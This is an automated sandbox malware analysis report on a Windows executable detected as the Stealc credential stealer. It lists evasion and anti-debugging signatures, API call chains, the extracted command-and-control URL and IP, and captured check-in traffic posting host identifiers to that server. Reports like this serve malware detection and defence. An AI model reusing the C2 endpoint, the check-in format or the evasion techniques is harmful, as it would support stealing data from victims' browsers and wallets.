
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560591
MD5: 7f133608117d2d14e36a7b73d6c173af
SHA1: b0d7ad4e7b66129b16512761d4a86303b5928a81
SHA256: 3806b9f4eb73630796343fa069a80fc29705bd31f719ab9ad8841a17f225b8c4
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 404 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7F133608117D2D14E36A7B73D6C173AF)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Yara matches (Source | Rule | Description | Author):
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2186915935.0000000004A90000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 404 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 404 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata IDS alerts:
Timestamp: 2024-11-22T01:02:14.488656+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.6 | Source Port: 49717 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/405117-2476756634-1003u | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpJA | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpoIHH | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php5IfH | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpfA | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/YIzH | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004040B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003EEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E9B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003FE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003EDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003F2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003EDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003FCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003FDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003FD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49717 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 32 33 37 38 39 35 39 38 31 36 32 32 33 35 37 33 34 35 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 2d 2d 0d 0a
    Data Ascii (multipart body, CRLF line breaks restored from the raw bytes):
        ------KFCBAEHCAEGDHJKFHJKF
        Content-Disposition: form-data; name="hwid"

        2023789598162235734526
        ------KFCBAEHCAEGDHJKFHJKF
        Content-Disposition: form-data; name="build"

        mars
        ------KFCBAEHCAEGDHJKFHJKF--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206//
Source: file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/405117-2476756634-1003u
Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/I
Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/YIzH
Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/_
Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php5IfH
Source: file.exe, 00000000.00000002.2236827089.00000000011FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpJA
Source: file.exe, 00000000.00000002.2236827089.00000000011FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfA
Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpoIHH
Source: file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpt
Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/h
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A406C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A30B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004048B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006AB9D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DFA77
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A5AD6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A0B04
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079D454
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00798C36
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A2572
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00772DD5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A76E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079EF58
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A8F3F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079B7EC
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 003E4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: tlwqldfy ZLIB complexity 0.9948204093589356
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00403A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003FCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7VOACHXG.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
